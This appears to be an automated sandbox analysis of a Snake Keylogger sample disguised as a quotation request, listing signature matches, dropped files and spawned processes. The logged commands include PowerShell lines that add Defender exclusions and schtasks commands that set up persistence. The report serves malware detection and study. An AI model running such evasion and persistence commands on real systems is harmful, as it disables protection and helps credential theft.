Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970006	9_2_05970006
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05973008	9_2_05973008
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976030	9_2_05976030
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976022	9_2_05976022
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970040	9_2_05970040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972BB0	9_2_05972BB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972BA0	9_2_05972BA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05975BD8	9_2_05975BD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597531A	9_2_0597531A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597B318	9_2_0597B318
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597B307	9_2_0597B307
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972300	9_2_05972300
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597D308	9_2_0597D308
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05975328	9_2_05975328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05977B69	9_2_05977B69
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059772B8	9_2_059772B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059772C8	9_2_059772C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597D2F7	9_2_0597D2F7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059722F0	9_2_059722F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597F2F8	9_2_0597F2F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597F2E7	9_2_0597F2E7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976A18	9_2_05976A18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05971A50	9_2_05971A50
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05971A41	9_2_05971A41
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974A78	9_2_05974A78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974A68	9_2_05974A68
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_00BDD51C	11_2_00BDD51C
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069AC1F0	11_2_069AC1F0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A5798	11_2_069A5798
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A7278	11_2_069A7278
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A5360	11_2_069A5360
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A6E40	11_2_069A6E40
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A4F28	11_2_069A4F28
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166C146	14_2_0166C146
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_01667118	14_2_01667118
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166A088	14_2_0166A088
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_01665362	14_2_01665362
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166D278	14_2_0166D278
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166C468	14_2_0166C468
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166C738	14_2_0166C738
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_016669A0	14_2_016669A0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166E988	14_2_0166E988
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_01663B8C	14_2_01663B8C
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166CA08	14_2_0166CA08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166CCD8	14_2_0166CCD8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166CFAA	14_2_0166CFAA
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166F961	14_2_0166F961
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_0166E97A	14_2_0166E97A
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_016629EC	14_2_016629EC
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_01663AA1	14_2_01663AA1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_01663E09	14_2_01663E09
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB1E80	14_2_06DB1E80
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB17A0	14_2_06DB17A0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB0B30	14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB9C70	14_2_06DB9C70
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBFC68	14_2_06DBFC68
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBF810	14_2_06DBF810
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB5028	14_2_06DB5028
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB9548	14_2_06DB9548
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB2968	14_2_06DB2968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBEAF8	14_2_06DBEAF8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBE6B0	14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBE6AE	14_2_06DBE6AE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBE258	14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBE249	14_2_06DBE249
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB1E70	14_2_06DB1E70
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBDE00	14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB9BFB	14_2_06DB9BFB
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB8B91	14_2_06DB8B91
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB178F	14_2_06DB178F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBF3B8	14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB8BA0	14_2_06DB8BA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBEF51	14_2_06DBEF51
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBEF60	14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBEB08	14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB9328	14_2_06DB9328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB0B20	14_2_06DB0B20
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBD0F8	14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBCCA0	14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB0040	14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB501F	14_2_06DB501F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBF801	14_2_06DBF801
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB0007	14_2_06DB0007
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBDDFE	14_2_06DBDDFE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBD999	14_2_06DBD999
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBD9A8	14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBD550	14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DBD540	14_2_06DBD540

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118483464.0000000006F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000000.2057334200.0000000000692000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2112009646.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118838113.0000000007730000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4515200414.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000441000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jnqeRRexnD.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Mutant created: \Sessions\1\BaseNamedObjects\XLczWKrNQSJhyTchb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2F66.tmp

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000003065000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003343000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"	Jump to behavior
